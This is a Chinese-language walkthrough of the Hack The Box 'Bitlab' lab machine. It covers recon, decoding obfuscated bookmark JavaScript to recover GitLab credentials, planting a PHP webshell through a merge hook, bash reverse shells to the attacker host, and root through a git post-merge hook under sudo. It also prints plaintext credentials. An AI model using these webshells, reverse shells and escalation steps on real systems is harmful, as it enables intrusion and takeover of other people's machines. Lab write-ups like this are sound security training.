出品|MS08067實驗室(www.ms08067.com)
本文作者:是大方子(Ms08067實驗室核心成員)
0x00 本文目錄
- 反思與總結
- 基本資訊
- 滲透測驗程序
- 補充
0x01 反思與總結
- curl 發送GET引數化請求
- 對反彈回來的shell進行設定完善
- 使用git hooks來進行提權
0x02 基本資訊
靶機IP地址:10.10.10.114
Kali IP地址:10.10.14.13
0x03 滲透測驗程序
埠探測
root@kali:~/HTB/bitlab# nmap ‐sC ‐sV ‐oA bitloab 10.10.10.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020‐01‐22 10:04 CST
Nmap scan report for 10.10.10.114
Host is up (0.24s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh‐hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open http nginx
| http‐robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http‐title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.114/users/sign_in
|_http‐trane‐info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.44 seconds
目標靶機開放了80 和 22埠
目錄探測
我們先從80下手,查看下網頁內容
先使用gobuster進行掃描
gobuster dir ‐u "http://10.10.10.114/" ‐w /usr/share/wordlists/dirbuster/directory‐list‐2.3‐medium.txt ‐t 150 ‐s 200,204,301,307,401,403 ‐o bitlab.gobuster
引數介紹:
dir: 表示掃描目錄的模式
-w: 使用的字典
-t: 執行緒數量
-s: 只顯示回應碼為200,204,301,307,401,403的路徑,因為我們訪問網頁的時候有些位置是不允許我們訪問會被302跳轉到登錄界面
對出現的結果逐一查看,發現除了help外其他的網頁都沒什么可用資訊
漏洞發現
打開help下的bookmarks.html
對這幾個超鏈接逐一查看,發現前面4個連接都只是分別指向hackthebox,Docker,PHP,Node.js的官網并沒有什么資訊
點擊 【Gitlab Login】 時,發現沒反應,但是出現了javascript代碼,
我們打開原始碼進行查看
把javascript代碼復制出來放到https://beautifier.io/進行美化并把里面的HTML物體去除,得到下面的結果
javascript: (function() {
var _0x4b18 = ["\x76\x61\x6C\x75\x65", "\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];
document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]] = _0x4b18[3];
document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]] = _0x4b18[5];
})()
把_0x4b18里面的內容翻譯下(十六進制轉字符)
var _0x4b18 = ["value", "user_login", "getElementById", "clave", "user_password","11des0081x"];
那么下面2行代碼
document[getElementById](user_login)[value] = clave;
document[getElementById](user_password)[value] = 11des0081x;
感覺是賬號密碼的感覺,我們在登錄界面使用console進行嘗試
賬號密碼直接出現并成功登錄
登錄后有2個庫
在deployer中發現index.php,像是一個掛鉤檔案,當Profile存盤庫合并了一個新的提交時就會執行命令
切換到 profile目錄 , 并且執行sudo git pull
<?php
$input = file_get_contents("php://input");
$payload = json_decode($input);
$repo = $payload‐>project‐>name ?? '';
$event = $payload‐>event_type ?? '';
$state = $payload‐>object_attributes‐>state ?? '';
$branch = $payload‐>object_attributes‐>target_branch ?? '';
if ($repo=='Profile' && $branch=='master' && $event=='merge_request' && $state=='merged')
{
echo shell_exec('cd ../profile/; sudo git pull'),"\n";
}
echo "OK\n";
那么我們只要寫入一個webshell并合并到profile庫中,那么這個index.php就會把我們的webshell給pull下來
我們創建一個分支
切換到這個分支,然后在這個分支上創建一個webshell
寫入一個webshell,并提交
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
創建合并請求
然后就可以看到我們的webshell就成功合并如mstaer庫
此時應該會被之前的掛鉤檔案pull到本地,我們嘗試訪問看看
http://10.10.10.114/profile/dfz.php?cmd=whoami
也可以通過curl來進行命令執行
curl ‐G "http://10.10.10.114/profile/dfz.php" ‐‐data‐urlencode 'cmd=whoami'
-G:表示發送GET請求
--data--urlencode:對資料進行URL編碼
這樣我們就拿到了webshell
反彈shell
接下來就是反彈shell
kali先nc先監聽埠
然后用curl反彈,這里需要注意的是,反彈shell的指令前面還需要用到bash -c
curl ‐G "http://10.10.10.114/profile/dfz.php" ‐‐data‐urlencode "cmd=bash ‐c 'bash ‐i >&/dev/tcp/10.10.14.13/9001 0>&1'"
反彈回來的shell,會出現字符錯誤,無法編輯vim等問題
輸入下面的指令對反彈回來的shell進行設定,讓后面我們可以正常使用
python ‐c "import pty;pty.spawn('/bin/bash')"
ctrl + z (后臺掛起shell)
stty raw ‐echo
fg + 多個回車
stty rows 34 cols 136
export TERM=xterm
這樣我們反彈回來的shell就可以像我們平常用的那個shell一樣了
權限提升
進入之后我們看下sudo -l 有沒有能突破的點
這里我們可以看到 www-data用戶可以不需要密碼
以root的權限呼叫git pull 命令
這里我們可以用git的hook檔案來進行提權
在.git/hooks檔案中有一些模板,我們可以對照進行撰寫
因為sudo運行www-data用戶運行git pull檔案
那么我們找下運行這個命令的時候會觸發哪個hook檔案
可以通過下面命令查看
man githooks
``
可以看到在執行git pull時,會觸發post-merge這個檔案
但是在hook檔案里面沒有這個檔案,我需要手動創建
但是這個檔案夾我們沒有寫的權限
那么我們把這個檔案給重新拷貝一份出來
然后在 /tmp/dfz/profile/.git/hooks/中創建一個 post-merge檔案 ,并賦予執行權限
!/bin/bash
bash ‐c 'bash ‐i >& /dev/tcp/10.10.14.11/9000 0>&1'
那么我們接下來做的就是要觸發git pull,在這之前我們需要在倉庫里面添加一個新的檔案,這樣git pull才能有效果,否則就有如下的提示
我們可以直接添加一個檔案并合并
kali進行監聽,然后再進行sudo git pull
然后就得到root權限
##0x04 補充
還有另一種方法get flag
我們在進入到profile倉庫后可以看到一個TODO
然后我們在
http://10.10.10.114/users/clave/snippets
里面找到postgresql的代碼片段
可以看到這段代碼在查詢資料,我們可以看下它查詢的是什么資料
array(1) {
[0]=>
array(3) {
["id"]=>
string(1) "1"
["username"]=>
string(5) "clave"
["password"]=>
string(22) "c3NoLXN0cjBuZy1wQHNz=="
}
}
我們嘗試登錄到clave
成功!
同時我們在clave的家目錄下看到一個exe
我們通過scp下載回來
scp [email protected]:RemoteConnection.exe .
使用OD進行除錯也可以看到root的賬號密碼
Qf7]8YSV.wDNF*[7d?j&eD4^
 
 
 
**<font color=red>轉載請聯系作者并注明出處!</font>**
Ms08067安全實驗室專注于網路安全知識的普及和培訓,團隊已出版《Web安全攻防:滲透測驗實戰指南》,《內網安全攻防:滲透測驗實戰指南》,《Python安全攻防:滲透測驗實戰指南》,《Java代碼安全審計(入門篇)》等書籍,
團隊公眾號定期分享關于CTF靶場、內網滲透、APT方面技術干貨,從零開始、以實戰落地為主,致力于做一個實用的干貨分享型公眾號,
官方網站:https://www.ms08067.com/
掃描下方二維碼加入實驗室VIP社區
加入后邀請加入內部VIP群,內部微信群永久有效!
<img src="https://img.uj5u.com/2021/04/01/2317940117400923.jpg" width=30% height=30%> <img src="https://img.uj5u.com/2021/04/01/2317940117400924.jpg" width=30% height=30%> <img src="https://img.uj5u.com/2021/04/01/2317940117400925.jpg" width=30% height=30%>
<img src="https://img.uj5u.com/2021/04/01/2317940117400926.jpg" width=30% height=30%> <img src="https://img.uj5u.com/2021/04/01/2317940117400927.jpg" width=30% height=30%> <img src="https://img.uj5u.com/2021/04/01/2317940117400928.jpg" width=30% height=30%>轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/270658.html
標籤:其他
下一篇:jarvis OJ-DSA